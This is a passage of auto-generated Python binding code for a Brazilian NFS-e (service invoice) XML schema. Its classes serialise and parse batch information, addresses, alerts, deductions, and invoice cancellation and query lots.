outfile.write('<ns1:ValorTotalServicos>%s</ns1:ValorTotalServicos>%s' % (self.gds_format_float(self.ValorTotalServicos, input_name='ValorTotalServicos'), eol_))
if self.ValorTotalDeducoes is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorTotalDeducoes>%s</ns1:ValorTotalDeducoes>%s' % (self.gds_format_float(self.ValorTotalDeducoes, input_name='ValorTotalDeducoes'), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'NumeroLote':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroLote')
self.NumeroLote = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroLote)
elif nodeName_ == 'InscricaoPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoPrestador')
self.InscricaoPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoPrestador)
elif nodeName_ == 'CPFCNPJRemetente':
CPFCNPJRemetente_ = child_.text
CPFCNPJRemetente_ = self.gds_validate_string(CPFCNPJRemetente_, node, 'CPFCNPJRemetente')
self.CPFCNPJRemetente = CPFCNPJRemetente_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJRemetente)
elif nodeName_ == 'DataEnvioLote':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEnvioLote = dval_
elif nodeName_ == 'QtdNotasProcessadas':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'QtdNotasProcessadas')
self.QtdNotasProcessadas = fval_
# validate type tpQuantidade
self.validate_tpQuantidade(self.QtdNotasProcessadas)
elif nodeName_ == 'TempoProcessamento':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'TempoProcessamento')
self.TempoProcessamento = ival_
# validate type tpTempoProcessamento
self.validate_tpTempoProcessamento(self.TempoProcessamento)
elif nodeName_ == 'ValorTotalServicos':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalServicos')
self.ValorTotalServicos = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalServicos)
elif nodeName_ == 'ValorTotalDeducoes':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorTotalDeducoes')
self.ValorTotalDeducoes = fval_
# validate type tpValor
self.validate_tpValor(self.ValorTotalDeducoes)
# end class tpInformacoesLote
class tpLogradouroCompleto(GeneratedsSuper):
"""Informações do Logradouro com o seu Tipo."""
subclass = None
superclass = None
def __init__(self, TipoLogradouro=None, NomeLogradouro=None):
self.original_tagname_ = None
self.TipoLogradouro = TipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
self.NomeLogradouro = NomeLogradouro
self.validate_tpLogradouro(self.NomeLogradouro)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLogradouroCompleto)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLogradouroCompleto.subclass:
return tpLogradouroCompleto.subclass(*args_, **kwargs_)
else:
return tpLogradouroCompleto(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpTipoLogradouro(self, value):
# Validate type tpTipoLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 10:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoLogradouro' % {"value" : value.encode("utf-8")} )
def validate_tpLogradouro(self, value):
# Validate type tpLogradouro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpLogradouro' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.TipoLogradouro is not None or
self.NomeLogradouro is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLogradouroCompleto', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLogradouroCompleto')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLogradouroCompleto')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLogradouroCompleto', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLogradouroCompleto'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLogradouroCompleto', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.TipoLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouro>%s</ns1:TipoLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouro), input_name='TipoLogradouro')), eol_))
if self.NomeLogradouro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NomeLogradouro>%s</ns1:NomeLogradouro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NomeLogradouro), input_name='NomeLogradouro')), eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'TipoLogradouro':
TipoLogradouro_ = child_.text
TipoLogradouro_ = self.gds_validate_string(TipoLogradouro_, node, 'TipoLogradouro')
self.TipoLogradouro = TipoLogradouro_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouro)
elif nodeName_ == 'NomeLogradouro':
NomeLogradouro_ = child_.text
NomeLogradouro_ = self.gds_validate_string(NomeLogradouro_, node, 'NomeLogradouro')
self.NomeLogradouro = NomeLogradouro_
# validate type tpLogradouro
self.validate_tpLogradouro(self.NomeLogradouro)
# end class tpLogradouroCompleto
class tpListaAlertas(GeneratedsSuper):
"""Alertas."""
subclass = None
superclass = None
def __init__(self, Alerta=None):
self.original_tagname_ = None
if Alerta is None:
self.Alerta = []
else:
self.Alerta = Alerta
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaAlertas)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaAlertas.subclass:
return tpListaAlertas.subclass(*args_, **kwargs_)
else:
return tpListaAlertas(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Alerta
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaAlertas', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaAlertas')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaAlertas')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaAlertas', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaAlertas'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaAlertas', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Alerta_ in self.Alerta:
Alerta_.export(outfile, level, namespace_, name_='Alerta', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Alerta':
obj_ = tpEvento.factory()
obj_.build(child_)
self.Alerta.append(obj_)
obj_.original_tagname_ = 'Alerta'
# end class tpListaAlertas
class tpListaDeducoes(GeneratedsSuper):
"""Deduções."""
subclass = None
superclass = None
def __init__(self, Deducao=None):
self.original_tagname_ = None
if Deducao is None:
self.Deducao = []
else:
self.Deducao = Deducao
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpListaDeducoes)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpListaDeducoes.subclass:
return tpListaDeducoes.subclass(*args_, **kwargs_)
else:
return tpListaDeducoes(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Deducao
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpListaDeducoes', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpListaDeducoes')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpListaDeducoes')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpListaDeducoes', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpListaDeducoes'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpListaDeducoes', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Deducao_ in self.Deducao:
Deducao_.export(outfile, level, namespace_, name_='Deducao', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Deducao':
obj_ = tpDeducoes.factory()
obj_.build(child_)
self.Deducao.append(obj_)
obj_.original_tagname_ = 'Deducao'
# end class tpListaDeducoes
class tpLoteCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, Nota=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLoteCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLoteCancelamentoNFSe.subclass:
return tpLoteCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpLoteCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLoteCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLoteCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLoteCancelamentoNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLoteCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpLoteCancelamentoNFSe
class tpNotasCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotasCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotasCancelamentoNFSe.subclass:
return tpNotasCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpNotasCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotasCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotasCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotasCancelamentoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotasCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpNotasCancelamentoNFSe
class tpRetornoNotasCancelamentoNFSe(GeneratedsSuper):
"""Lista de Detalhes do Cancelamento de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpRetornoNotasCancelamentoNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpRetornoNotasCancelamentoNFSe.subclass:
return tpRetornoNotasCancelamentoNFSe.subclass(*args_, **kwargs_)
else:
return tpRetornoNotasCancelamentoNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRetornoNotasCancelamentoNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRetornoNotasCancelamentoNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRetornoNotasCancelamentoNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaCancelamentoNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpRetornoNotasCancelamentoNFSe
class tpLoteConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, NotaConsulta=None, RPSConsulta=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.NotaConsulta = NotaConsulta
self.RPSConsulta = RPSConsulta
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpLoteConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpLoteConsultaNFSe.subclass:
return tpLoteConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpLoteConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.NotaConsulta is not None or
self.RPSConsulta is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpLoteConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpLoteConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpLoteConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpLoteConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpLoteConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpLoteConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.NotaConsulta is not None:
self.NotaConsulta.export(outfile, level, namespace_, name_='NotaConsulta', pretty_print=pretty_print)
if self.RPSConsulta is not None:
self.RPSConsulta.export(outfile, level, namespace_, name_='RPSConsulta', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'NotaConsulta':
obj_ = tpNotasConsultaNFSe.factory()
obj_.build(child_)
self.NotaConsulta = obj_
obj_.original_tagname_ = 'NotaConsulta'
elif nodeName_ == 'RPSConsulta':
obj_ = tpRPSsConsultaNFSe.factory()
obj_.build(child_)
self.RPSConsulta = obj_
obj_.original_tagname_ = 'RPSConsulta'
# end class tpLoteConsultaNFSe
class tpNotasConsultaNFSe(GeneratedsSuper):
"""Lista de Detalhes da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Nota=None):
self.original_tagname_ = None
if Nota is None:
self.Nota = []
else:
self.Nota = Nota
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotasConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotasConsultaNFSe.subclass:
return tpNotasConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpNotasConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def hasContent_(self):
if (
self.Nota
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotasConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotasConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotasConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotasConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotasConsultaNFSe'):
pass
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpNotasConsultaNFSe', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for Nota_ in self.Nota:
Nota_.export(outfile, level, namespace_, name_='Nota', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Nota':
obj_ = tpNotaConsultaNFSe.factory()
obj_.build(child_)
self.Nota.append(obj_)
obj_.original_tagname_ = 'Nota'
# end class tpNotasConsultaNFSe
class tpNotaConsultaNFSe(GeneratedsSuper):
"""Tipo Detalhes da Nota da Consulta de NFSe."""
subclass = None
superclass = None
def __init__(self, Id=None, InscricaoMunicipalPrestador=None, NumeroNota=None, CodigoVerificacao=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.NumeroNota = NumeroNota
self.validate_tpNumero(self.NumeroNota)
self.CodigoVerificacao = CodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
def factory(*args_, **kwargs_):
if CurrentSubclassModule_ is not None:
subclass = getSubclassFromModule_(
CurrentSubclassModule_, tpNotaConsultaNFSe)
if subclass is not None:
return subclass(*args_, **kwargs_)
if tpNotaConsultaNFSe.subclass:
return tpNotaConsultaNFSe.subclass(*args_, **kwargs_)
else:
return tpNotaConsultaNFSe(*args_, **kwargs_)
factory = staticmethod(factory)
def validate_tpInscricaoMunicipal(self, value):
# Validate type tpInscricaoMunicipal, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpInscricaoMunicipal_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpInscricaoMunicipal_patterns_, ))
validate_tpInscricaoMunicipal_patterns_ = [['^[0-9]{6,11}$']]
def validate_tpNumero(self, value):
# Validate type tpNumero, a restriction on xs:long.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpNumero' % {"value" : value} )
if value > 2147483647:
warnings_.warn('Value "%(value)s" does not match xsd maxInclusive restriction on tpNumero' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpNumero_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpNumero_patterns_, ))
validate_tpNumero_patterns_ = [['^[0-9]{1,12}$']]
def validate_tpCodigoVerificacao(self, value):
# Validate type tpCodigoVerificacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 255:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
if len(value) < 1:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCodigoVerificacao' % {"value" : value.encode("utf-8")} )
def hasContent_(self):
if (
self.InscricaoMunicipalPrestador is not None or
self.NumeroNota is not None or
self.CodigoVerificacao is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpNotaConsultaNFSe', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpNotaConsultaNFSe')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpNotaConsultaNFSe')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpNotaConsultaNFSe', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpNotaConsultaNFSe'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
